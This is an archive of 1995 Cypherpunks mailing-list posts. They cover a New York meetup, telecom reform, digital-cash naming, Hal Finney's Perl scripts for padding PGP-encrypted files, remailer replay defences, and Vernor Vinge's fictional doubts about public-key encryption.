> talk2subs@wired.com)

[ clip ]

Neato. I'm tempted to send 'em a message saying "Where's the crime?!"...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjwohler@netcom.com (Marc Wohler)
Date: Sat, 4 Feb 95 06:26:35 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: NYC CPUNKS MEET NEXT SAT
Message-ID: <199502041425.GAA29475@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Attn.: New York City area Cypherpunks

NYC C'punks meeting:

Sat Feb 11, 3:00 P.M., at the home of Linn & Barbara  Stanton
315 West 106 Street  Apt 2A 
(Between West End Ave & Riverside Drive)
212-316-1958.

Once again the gracious Stanton's invite local area Cpunks to
their lovely home which is smoke free and feline friendly.

The agenda is still open and suggestions can be made to
mjwohler@netcom.com
or phone Marc Wohler @ 212-362-0690. Let me know if you plan to
attend.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy+PL2eikzgqLB7pAQGHigP9HW1Py30O2fcZH/f1SAOToOBZYVZMiB9c
buGQrujaicGVJlvGb1Le/OjJ872JB69BQD1MMsemABSYi4swL15w9qj1rhoTAHIg
yTRDFJD16g1lqqLvEJZ0RijOh1dXLaUg8HNue0JoSAbARkQed8I3+mklP4C4saYn
qW2Fa/kDuZY=
=Rl9C
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Sat, 4 Feb 95 05:59:04 PST
To: extropians@panix.com (e)
Subject: Forward: Teleco/Cabe REg. & Free speech
Message-ID: <199502041358.AA09885@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


TELECOM REFORM, REPUBLICAN-STYLE Sen. Larry Pressler (R-SD) has
proposed a telecommunications reform plan that would drop all cable TV
rate regulations; allow local phone and cable competition and
cross-ownership in one year; ease foreign ownership restrictions; and
allow local phone companies to compete in long distance in three
years. A formal counter proposal is expected from the Democrats
February 14, and it's expected that there will be objections to most
of the provisions outlined in Pressler's bill. (Investor's Business
Daily 2/2/95 A4)

(((cut here)))

For those that don't know I have my Master's in Interactive
Telecommunications, and have long looked at cable and teleco from
several angles including freemarket and cypherpunk viewpoints.

While there is a lack of detail here, I strongly endorse anything that
lets cable and phone companies compete. They have largely the same
customer base (although telco's have a larger % of the base), but the
cable companies are in a better opportunity to over PCS,
higher-bandwidth networking, and video on demand.

What we have to watch out for is FCC regulation. It is well excepted
that the FCC can censor commercial speech (cig. ads), and individual
speech (the 7 dirty words), in the "public" interest.

Cable and Teleco are FCC regulated. If they provide the network of
the future, as opposed to UUnet-Microsoft (for example), we might
have to be careful..

The "model" of interactivity most "thinking" people endorse is one
that is two way. The FCC does really monitor what you say on the phone
(although who knows about the NSA ;)... If you can in the brave new
Telco/Cable future send as well as receive.. and send in
broadcast-like mode... are you subject to content approval from the
FCC?

We should strongly endorse this move by. Sen. Pressler as it will
get us broadband to many homes in 5 to 7 years, but we have to
remain concerned about our freedom to speak not matter if that is
one on one, or to a large group!

/hawk


-- 
Harry S. Hawk  		   habs@panix.com
Product Marketing Manager
PowerMail, Inc. 	   Producers of MailWeir(tm) & PowerServ(tm)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 4 Feb 95 10:11:09 PST
To: cypherpunks@toad.com
Subject: There is another NetCash
Message-ID: <199502041810.KAA20164@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: rah@shipwright.com (Robert Hettinga)
> At 5:19 AM 2/4/95, Anonymous wrote:
> >I wonder if 'Net-cash' is any good?
>
> Probably the best discussion of the available transaction
> processing/settlement mechanisms is by Jason Solinsky. It's called "An
> Introduction to Electronic Commerce", and though he probably hasn't updated
> it since he wrote it a few months ago, he discusses NetCash there...

People interested in NetCash should be aware of a potentially confusing
name re-use.  NetCash is also the name of a payment system designed by
people associated with the Information Sciences Institute (affiliated, I
think, with USC).  A reference is: <URL:
ftp://PROSPERO.ISI.EDU/pub/netcheque/information/netcash-cccs93.ps.Z >
 
Despite the names, neither one is cash in the cryptographic sense:
neither uses blinding.  If you didn't want the bank to be able to create
a database of every transaction you make, everything you spend and with
whom, you would need to have some anonymous connection with the bank and
exchange your netcash through that connection.  This would be cumbersome
IMO.  Some payment system is probably better than none, but I hate to see
the name "cash" expropriated by these non-cash systems.
 
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 4 Feb 95 10:17:03 PST
To: cypherpunks@toad.com
Subject: PGP padding scripts (again)
Message-ID: <199502041816.KAA20644@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the bandwidth waste, but my anonymous correspondent was not
able to ftp these scripts.  I also got another request for the scripts.
So here again is my post with a pair of perl scripts which will insert
padding pretty much undetectably into a .pgp file.  The one limitation is
the quality of Perl's random number generator.



Here are a couple of perl scripts I wrote last year to add padding to PGP
encrypted files.  The usage would be:

perl pgppadt.pl filename bytestoadd

The output file is filename.pad.

It only works on binary ".pgp" public-key encrypted files (not ascii armored
files).  So there would be some work needed to make it a really useful tool.
It would also be better to use a strong source of random numbers.  I
think Carl Ellison recently posted some tools that could help with this.
The two files are pgppad.pl, which does the work, and pgppadt.pl, a very
simple test driver to show how to use it.  They are in a shar archive.

Hal

---------------cut here----------------
#!/bin/sh
# to extract, remove the header and type "sh filename"
if `test ! -s ./pgppad.pl`
then
echo "writing ./pgppad.pl"
cat > ./pgppad.pl << '\End\Of\Shar\'
# Perl module to allow padding and some other manipulation of PGP
# files.
#
# Include this with the statement:
# require 'pgppad.pl'
#
# 10/16/93
# Hal Finney


# Read a PGP Cipher Type Byte and the following length.
# One argument: file to read from
# Returns several things, in this order:
# CTB, with the length information removed, as a number.
# Length of following packet.
# Name of this kind of packet, made up, see list below.
# Packed CTB/length packet, suitable for writing out.
# Returns an empty string on error.
sub read_ctb {
    local($file) = @_;
    local($ctb, $length, $name, $rctb, $rlength, $lengthlength);

    if (read ($file, $rctb, 1) != 1) {		# Raw ctb
	return "";
    }
    $ctb = unpack ("C", $rctb);
    if ($ctb < 128) {
	return "";		# Must have high bit set
    }
    $lengthlength = $ctb % 4;
    $ctb -= $lengthlength;
    if ($lengthlength == 0) {
	$lengthlength = 1;
    } elsif ($lengthlength == 1) {
	$lengthlength = 2;
    } elsif ($lengthlength == 2) {
	$lengthlength = 4;
    } else {
	$lengthlength = 0;
	$length = -1;	# Unknown length
    }
    if (read ($file, $rlength, $lengthlength) != $lengthlength) {
	return "";
    }
    if ($lengthlength==1) {
	$length = unpack("C", $rlength);
    } elsif ($lengthlength==2) {
	$length = unpack("n", $rlength);
    } elsif ($lengthlength==4) {
	$length = unpack("N", $rlength);
    }
    $rctb = pack ("C a".$lengthlength, $rctb, $rlength);  # Packed data
    if ($ctb==0x84) {
	$name = "pubkey header";
    } elsif ($ctb==0x88) {
	$name = "signature";
    } elsif ($ctb==0x8c) {
	$name = "message digest";
    } elsif ($ctb==0x94) {
	$name = "secret key";
    } elsif ($ctb==0x98) {
	$name = "public key";
    } elsif ($ctb==0xa0) {
	$name = "compressed";
    } elsif ($ctb==0xa4) {
	$name = "conventional encrypted";
    } elsif ($ctb==0xa8) {
	$name = "plaintext";
    } elsif ($ctb==0xb0) {
	$name = "trust";
    } elsif ($ctb==0xb4) {
	$name = "user id";
    } elsif ($ctb==0xb8) {
	$name = "comment";
    } else {
	return "";
    }
    return ($ctb, $length, $name, $rctb);
}

# Write a CTB and length field out.
# 3 arguments: file handle, ctb value, and length in bytes.
# No return value.
# Length gets output as 1, 2, or 4 bytes, the smallest in which it
# will fit.
# If length is negative we output no length field, but an "indefinite
# length" code is added to ctb.
sub write_ctb {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	$rctb = pack ("C", $ctb+3);		# Packed data
    } elsif ($length > 65535) {
	$rctb = pack ("C N", $ctb+2, $length);  # Packed data
    } elsif ($length > 255) {
	$rctb = pack ("C n", $ctb+1, $length);  # Packed data
    } else {
	$rctb = pack ("C C", $ctb+0, $length);  # Packed data
    }
    print $file $rctb;
}

# This entry point always outputs a 4-byte count.  Length must be > 0.
# Otherwise like write_ctb.
sub write_ctb_4 {
    local($file, $ctb, $length) = @_;
    local($rctb);

    $ctb = $ctb - ($ctb % 4);	# Be sure 2 low bits are clear
    if ($length < 0) {
	die ("write_ctb_4 called with negative length\n");
    }
    $rctb = pack ("C N", $ctb+2, $length);  # Packed data
    print $file $rctb;
}


# Pad a PGP public-key-encrypted file to the specified length.
# Arguments: input file handle; output file handle; new size.
# Returns negative value on error.  See the code for what the
# different values mean.
# Returns 0 on success.
sub pgppad {
    local($infile, $outfile, $size) = @_;
    local($ctb, $length, $name, $rctb, $insize, $buf);

    # Read ctb & length of pubkey header
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -1;	# Error
    }
    if ($name ne "pubkey header") {
	return -2;	# Error
    }
    if ($len < 0) {
	return -3;	# Error
    }

    $insize = length($rctb) + $len;

    # Read packet of pubkey header
    if (read ($infile, $data, $len) != $len) {
	return -3;
    }

    # Write out pubkey header, unchanged
    &write_ctb($outfile, $ctb, $len);
    print $outfile $data;

    # Read ctb and length of conventional packet
    ($ctb, $len, $name, $rctb) = &read_ctb($infile);
    if ($ctb == 0) {
	return -4;	# Error
    }
    if ($name ne "conventional encrypted") {
	return -5;	# Error
    }

    # Calculate size of outgoing conventional packet.
    # Assume rctb won't change size; it may grow by 1 or 2 in some
    # rather rare cases, in which case we'll be a byte or two too big.
    $size -= $insize + length($rctb);
    if ($size < $len) {
	return -6;	# Error
    }

    # Output CTB with new length
    &write_ctb_4($outfile, $ctb, $size);

    # Copy remainder of input file
    while (read ($infile, $buf, 32768)) {
	print $outfile $buf;
    }

    # Note that this random number generator is probably not
    # cryptographically strong.
    srand (time|$$);
    while ($len < $size) {
	print $outfile pack ("C", int(rand(256)));
	++$len;
    }

    return 0;		# Success
}

1;	# Non-zero return for 'require'
\End\Of\Shar\
else
  echo "will not over write ./pgppad.pl"
fi
if `test ! -s ./pgppadt.pl`
then
echo "writing ./pgppadt.pl"
cat > ./pgppadt.pl << '\End\Of\Shar\'
# Test program for pgppad.pl, showing how to use it.
require 'pgppad.pl';

open (IN, $ARGV[0]) || die ("Couldn't open $ARGV[0]\n");
open (OUT, ">$ARGV[0].pad") || die ("Couldn't create $ARGV[0].pad\n");

$padding = $ARGV[1];

@stat = stat(IN);
$size = $stat[7];
print "Input file $ARGV[0] has size $size bytes\n";
print "Output file $ARGV[0].pad will have size ".$size+$padding." bytes\n";

if (($code = &pgppad (IN, OUT, $size+$padding)) < 0) {
    die ("pgppad returns code $code\n");
}

close (IN);
close (OUT);
print ("Done\n");

\End\Of\Shar\
else
  echo "will not over write ./pgppadt.pl"
fi
echo "Finished archive 1 of 1"
exit





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 4 Feb 95 07:31:56 PST
To: Anonymous <cypherpunks@toad.com
Subject: Re: <none specified>
Message-ID: <v01510100ab5909e219ad@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:19 AM 2/4/95, Anonymous wrote:
>I wonder if 'Net-cash' is any good?

Probably the best discussion of the available transaction
processing/settlement mechanisms is by Jason Solinsky. It's called "An
Introduction to Electronic Commerce", and though he probably hasn't updated
it since he wrote it a few months ago, he discusses NetCash there...


http://nearnet.gnn.com/gnn/meta/finance/feat/sol.html

Take a bow, Jason.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjb@acpub.duke.edu (Tom Bryce)
Date: Sat, 4 Feb 95 09:05:15 PST
To: cypherpunks@toad.com
Subject: signature validation on secure edit messages
Message-ID: <v01510106ab5965a112c3@[152.3.113.8]>
MIME-Version: 1.0
Content-Type: text/plain


Jeez. I really don't know why the heck this always happens to me, my
digsigs not validating.

You can finger me at tjbryce@amherst.edu to retrieve a message with a valid
signature.

I always write the message in eudora, copy it, sign it in MacPGP as TEXT
with attached signature, then go back and paste it over the old message.
Then I go back to MacPGP and check the signature on the clipboard to be
sure - no problems. But after getting mailed, it doesn't work.

Damn.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 4 Feb 95 11:19:53 PST
To: cypherpunks@toad.com
Subject: Re: re to hfinney
In-Reply-To: <9502032142.AA17527@TeleCheck.com>
Message-ID: <950204.123917.2m0.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, turner@telecheck.com writes:

>> also , where can i get perl for dos , any idea ? tia .

> PERL can be obtained via anon FTP:
> 
>  ftp.uu.net                     137.39.1.9
>  archive.cis.ohio-state.edu     128.146.8.52
>  jpl-devvax.jpl.nasa.gov        128.149.1.43
> 
> Get the source code and start compiling... :>

Bring a lunch... you'll be at it a while.  :)

Perl is a non-trivial port to MS-DOS, but there are versions available.
Look on your favorite SimTel mirror site:

Directory SimTel/msdos/perl/
 Filename   Type Length   Date    Description
==============================================
bperl3s1.zip  B  505075  940412  32-bit Perl 4.0pl36 w/VM & Win supt. (src 1/3)
bperl3s2.zip  B  530821  940412  32-bit Perl 4.0pl36 w/VM & Win supt. (src 2/3)
bperl3s3.zip  B  522530  940412  32-bit Perl 4.0pl36 w/VM & Win supt. (src 3/3)
bperl3x.zip   B  482794  940412  32-bit Perl 4.0pl36 w/VM & Win 3.1 supt. (exe)
perl4019.zip  B  196446  920620  UNIX-based scripting lang. replaces sh/awk/sed
perl419x.zip  B  435591  920317  Len Reed's port of Unix Perl v4.19
ptch19.zip    B  116444  920317  Len Reed's patch set to make perl 4.19
 
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLzPKuhvikii9febJAQH0QQP+I+gjmjrx4AFmwq71cxneTvo9xCqmckCj
nsZkNske/VQAmB3BJNgf/SgAahkHryq8xZ2aM0tWr8B0FLdObqxmUKYHfu801Jtm
6pCyhOSBKUffRfiI+dvFPbuhuCOGcl+poYH2lvdpxyL2ABs6+QNVXj+Q9AlrozzF
kpJXL4BjIlk=
=dM24
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sat, 4 Feb 95 11:06:20 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: PGP padding scripts (again)
In-Reply-To: <199502041816.KAA20644@jobe.shell.portal.com>
Message-ID: <Pine.SV4.3.91.950204130137.5569A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 4 Feb 1995, Hal wrote:

> Sorry for the bandwidth waste, but my anonymous correspondent was not
> able to ftp these scripts.  I also got another request for the scripts.
> So here again is my post with a pair of perl scripts which will insert
> padding pretty much undetectably into a .pgp file.  The one limitation is
> the quality of Perl's random number generator.

I've put em' up on my auto-responder. Send a message to: skaplin@c2.org
With the subject: SEND FILE pad

And you should get them within a couple of hours. 

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 4 Feb 95 14:12:44 PST
To: cypherpunks@toad.com
Subject: finney's perl scripts
Message-ID: <199502042212.OAA09528@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


hal , gotta question regarding your perl scripts .
 i ran em thru sh and d/l'd em , and here are the
results of my tests . first , i pgp'd a file in
 binary format , then ran " perl pgppadt.pl
test.pgp 10 " . the error i got was " Couldn't
 create test.pgp.pad " . so i renamed the file to
" test " and tried again with good results ! i got
 " Input file test has size 732 bytes 10 bytes 
pgppad returns code -3 " . then , iran " perl 
 pgppad.pl test 10 " and after the bit about perl
running under dos/4gw protected mode , i get dropped
 to my command prompt . i took a look at the file ,
and it's size wasn't any different , so i renamed the
 file to test.pgp and ran it again and got the same
results . so i guess i'm wonderin' if it added the
 padding , or what might be the problem ? for your
info , i'm using perl 4.0.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 4 Feb 95 11:53:03 PST
To: hfinney@shell.portal.com>
Subject: Re: There is another NetCash
Message-ID: <v01510102ab593f760d33@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 AM 2/4/95, Hal wrote:

>Some payment system is probably better than none, but I hate to see
>the name "cash" expropriated by these non-cash systems.

Indeed. That was the point of the URL to Mr. Solinsky's excellent
introduction to the subject.

It is easy to see that the original NetCash isn't a digital cash system,
with its clearing of a single-use serial number transmitted unencrypted in
the clear, and with its "bank" settling the transaction through the telco
900-number system. Not having looked yet, I bet the "other" NetCash is
probably not Chaumian-equivalent digital cash either, or we'd have heard
more about it. It would be a pretty major accomplishment, especially if it
doesn't violate Chaum's patents.

As Eric has said here recently, we have to remember the difference between
transaction clearing (which First Virtual, for example, does well, at least
as a prima facie system) and transaction settlement (which FV does on the
back of the Visa/MC network), which is what a true cash-settlement system
would do in one stroke.

Someday, and not now, I would like to take up the cudgel and jumpstart the
old offline/online cash debate. I like offline cash because it doesn't
require a bank intervention at every transaction, double-spending cash and
"inside-job" private key theft notwithstanding...

Ah, well.

Someday.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Sat, 4 Feb 95 14:31:31 PST
To: perry@imsi.com
Subject: Re: How the cypherpunks nearly got me fired (long)
In-Reply-To: <9502011435.AA26645@snark.imsi.com>
Message-ID: <m0raoM0-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Michael Sattler says:
> > At 22:10 1/31/95, David Mandl wrote:
> > 
> > [really horrid story about true life at a corporate dinosaur deleted]
...
> 
> I'm a consultant. However, I won't take on clients with sufficiently
> distasteful business practices. This is something I consider to be
> sufficiently distasteful.
> 
> Perry

Absolutely!

Good net access and good business practices are becoming requirements for
employment for many techies now.

It might be worthwhile to start keeping a list, a la 'The Great Piss List'
(whatever happened to it?), on business practices and net availability
at various companies.  Not to mention use and attitude toward privacy,
encryption, etc.  A name...  How about "Cyber-Work-Space Report".

I'll volunteer to start the list if people want to email me anything.
I can put it on my (slow but permanent) web site also.  Even if I
don't have much time, which is probable, I can make the messages available.

I can come up with details on at least 4.  The only issue I can think
of is being careful of not violating non-disclosures, but for the most
part I don't think it'll be a problem.  It's not much different from
asking: "How's the cafeteria", or "is the phone system nice".  I'll
also strip identity if requested.  You could always write a
description and ask for an OK from your manager to tell friends
because it would help them decide whether to work there.  (Which is
actually true.)

Since this is only partially tied into to cypherpunks, feel free to cross-
post and add attributes.

Initial attribute list:

Company:

Type of job:
(ie.: techies probably have more likelyhood of net access, etc.)

Plans:
(ie.: things promised or talked about seriously)

Privacy of email:

Routine scanning:

Encourage/discourage encryption:

Key management:
(ie.: Any planning for the 'Mack truck' scenario)

Net Access:
(email/Netnews/telnet/ftp(in/out)/irc/aol/various/Web server(public/internal),
 Business only/Educational-curiosity/Full use (a true fringe))

Justification:
(What was the argument used to get and/or maintain net access)

Platforms and software typically used:

Strategies used, good or bad, to limit 'addiction':

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 4 Feb 95 17:52:44 PST
To: cypherpunks@toad.com
Subject: Re: Vinge on PKE ?
In-Reply-To: <m0ravI7-0013GtC@garnet.msen.com>
Message-ID: <199502050152.RAA07725@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> lwp@garnet.msen.com (Lou Poppler) writes:
> important postings.  Some time ago it was asked why Vernor Vinge
> made passing reference to humans' naivete in trusting public key
> encryption, and some posters were seeking to contact professor

I don't recall the conversation, but it could refer to his recent novel
"A Fire Upon the Deep."  Our galaxy is divided into a number of zones where
computation can be easier or harder than in the particular section where
the Earth hangs out.  The fastest zones have computational ability so far
beyond what's physically possible in our zone that we don't understand it.

In this situation you can't trust your security to merely computationally
difficult problems like factoring large numbers: the denizens of the faster
zones could crack them faster than slower communicators could enumerate them.

The protagonists spent a fair amount of time on a courier ship that was
carrying as its cargo 1/3 of a one-time-pad, which was intended to get
to the buyer and be XORed with the other two pieces.  This was a valuable
cargo.  After it became clear that this 1/3 was potentially compromised it
was used for some important but less provably reliable communications.

	Jim Gillogly
	Trewesday, 15 Solmath S.R. 1995, 01:49




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 4 Feb 95 18:43:14 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <199502050242.SAA00239@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sun, 29 Jan 1995 17:56:34 -0800
> From: Hal <hfinney@shell.portal.com>
> 
> Of course it was Chaum himself in his 1981 paper (which I think is
> available from the CP FTP site) who described the duplicate-message
> attack.  I don't see that inter-remailing encryption helps much,
> because the attacker can still notice that whenever they inject
> message A, _something_ goes to Bob.  The real solution, as Chaum
> pointed out, is that the remailer must reject duplicate messages,
> even when separated by days.  Doing this without keeping a database
> of all messages ever sent is left as an exercise.

  Perhaps the postage could integrally contain the request-remailing-
to field.  Supose the postage were <e-money, to-address> encrypted to
the remailer.  Then replayers would want to copy the to-address into a
new piece of postage.  But, we assume, they can't figgure out what it
is because they don't have the key for the remailer.  

  If the remailer issued it's own non-blinded stamps, the remailer
would have to keep a list of canceled stamps.  (For as long as that
series of stamps remains valid.)  If the remailer used Chaumiam e-cash
no logs would need to be kept at all.

> Another aspect worth mentioning is that message splitting can make
> the kinds of statistical correlations that Wei Dai was looking at
> more of a danger.  [...]  Ideally you'd want to dribble them out at
> some standard rate, a rate at which you always send a message
> whether you have something to send or not.  But this may introduce
> unacceptable latency.

  If everybody ran a second level remailer, and if they always
forwarded something (of very nearly the same size) when they recieved
an encrypted message, then without compromising the users machine it
would be imposible to say when a message was delivered.  Some of the
messages forwarded would need to be junk.  Is there a polite way to
send mail to a remailer, and ask it to junk the mail?  Some of the
messages forwarded would have to be 'part n of m' messages.

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@garnet.msen.com (Lou Poppler)
Date: Sat, 4 Feb 95 16:57:38 PST
To: cypherpunks@toad.com
Subject: Vinge on PKE ?
Message-ID: <m0ravI7-0013GtC@garnet.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies if I repeat a question which has already been answered.
My only gateway onto the Net is very expensive, and I miss many
important postings.  Some time ago it was asked why Vernor Vinge
made passing reference to humans' naivete in trusting public key
encryption, and some posters were seeking to contact professor
Vinge for clarification.  Has any further explanation been 
discovered for his distrust of PKE?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@garnet.msen.com>
Date: Sat, 4 Feb 95 18:33:47 PST
To: cypherpunks@toad.com
Subject: Re: Vinge on PKE ?
In-Reply-To: <199502050152.RAA07725@mycroft.rand.org>
Message-ID: <Pine.BSI.3.91.950204211924.25224A-100000@garnet.msen.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 4 Feb 1995, Jim Gillogly wrote:
> "A Fire Upon the Deep."  Our galaxy is divided into a number of zones where
> computation can be easier or harder than in the particular section where
/.../ 
> In this situation you can't trust your security to merely computationally
> difficult problems like factoring large numbers: the denizens of the faster
> zones could crack them faster than slower communicators could enumerate them.

Yes, and even in the here and now, we suspect the existence of Powers with 
computational resources far in excess of our own.  But do we know for 
sure that PKE *must* rely on computational obfuscation?  Is it 
demonstrable that access to a public key always yields the secret key, 
given sufficient computational power?  Or is this only a result of the 
clumsy way we construct our keypairs here in the slow zone?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Sat, 4 Feb 95 19:26:57 PST
To: extropians@extropy.org
Subject: Re: Forward: Teleco/Cabe REg. & Free speech
In-Reply-To: <Pine.SUN.3.91.950204182755.14091B-100000@access.mbnet.mb.ca>
Message-ID: <199502050326.AA26218@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> paid for by digital cash.  Such a means of exchanging print, audio, 
> video, or any software might be virtually impossible to censor.  Would it 
> be possible to build such a network using current cable systems?  

It is a reasonable bet that all data into the home will come on
cable systems which means they require encrytion anyway.. there
are bridged, not point-to-point...

And other traffic like mobile voice and data will use some RF
technology...  which also requires encryption...

Existing cable systems are now running 1 gigahertz of bandwidth and
I had presentations from TW staff indicating 2 gigahertz is easily
reachable.. 

Figure 2 gigahertz of bandwidth (split between analog and digital
services) in each neighborhood and a ATM switch pulling those signals
back to the "head-end/central office" via fiber, and you have the
cable system of the future.. (e.g, for the next 5 to 20 years)..

/hawk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Sat, 4 Feb 95 15:42:16 PST
To: cypherpunks@toad.com
Subject: Re: Forward: Teleco/Cabe REg. & Free speech
In-Reply-To: <199502041358.AA09885@panix.com>
Message-ID: <1995Feb4.153121.29573@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502041358.AA09885@panix.com> habs@panix.com (Harry S. Hawk) writes:
>TELECOM REFORM, REPUBLICAN-STYLE Sen. Larry Pressler (R-SD) has
>proposed a telecommunications reform plan that would drop all cable TV
>rate regulations; allow local phone and cable competition and
>cross-ownership in one year; ease foreign ownership restrictions; and
>allow local phone companies to compete in long distance in three
>years. A formal counter proposal is expected from the Democrats
>February 14, and it's expected that there will be objections to most
>of the provisions outlined in Pressler's bill. (Investor's Business
>Daily 2/2/95 A4)
>
>(((cut here)))
>
>For those that don't know I have my Master's in Interactive
>Telecommunications, and have long looked at cable and teleco from
>several angles including freemarket and cypherpunk viewpoints.

I have to agree.  When I first moved to Austin Texas, the rates for
cable were not too bad, we were in an area that had a choice between
two cable companies.  After a couple years, a third company, a wireless
company came into town.  I then moved to Plano Texas, outside of
Dallas, and was absolutely SHOCKED at the cable prices.  Of course, in
Plano, there was ONE cable company, and all the channels except
broadcast channels were scrambled, so you HAD to get the cable box.  In
Austin, I could use the VCR tuner.  The only scrambled channels were
the premium channels.  The service in Austin was better and about 2/3
the cost.  I definately feel that competition is a MUST!

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 4 Feb 95 23:17:28 PST
To: CRSO.Cypherpunks@canrem.com
Subject: Re: Vinge on PKE ?
In-Reply-To: <60.19880.6525.0C1CDEB4@canrem.com>
Message-ID: <m0rb1D8-0004IoC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> LP+Apologies if I repeat a question which has already been answered.
>   +My only gateway onto the Net is very expensive, and I miss many
>   +important postings.  Some time ago it was asked why Vernor Vinge
>   +made passing reference to humans' naivete in trusting public key
>   +encryption, and some posters were seeking to contact professor
>   +Vinge for clarification.  Has any further explanation been 
>   +discovered for his distrust of PKE?
> 
> I once had a girlfriend who factored five digit numbers just by 
> looking at them.  "29367?  No, that's not prime.  It's 117 times 
> 251..."  Good ol' Elizabeth.  That's what you get for an "IQ" of 
> around 175.  Surely there might be higher "IQ's" someplace else in 
> Universe?
>  
> Albert Szent-Georgi once told me his thought that an IQ difference of 
> thirty points meant that one person solves by inspetion problems which 
> no amount of explanation can make clear to the other.  He added that 
> in a normal day we run into people spanning three such gulfs.
>  
> If an IQ of 100 routinely factors two digit decimal numbers, and you 
> get another digit for every twenty or thirty points, then you're 
> looking for beings with IQ's in the 1,000 range to factor 100 digits 
> binary...

There is a class of people called "idiot savants" who contain people who can also solve such
problems by inspection - their IQs are often much lower than 100, so that
blows Albert's theory.  These so-called "idiot savants" can easily factor
100 digit numbers.  The ability to solve such problems is not tied to IQ,
as there are many such people with IQs of 150+ who cannot solve them.
-- 
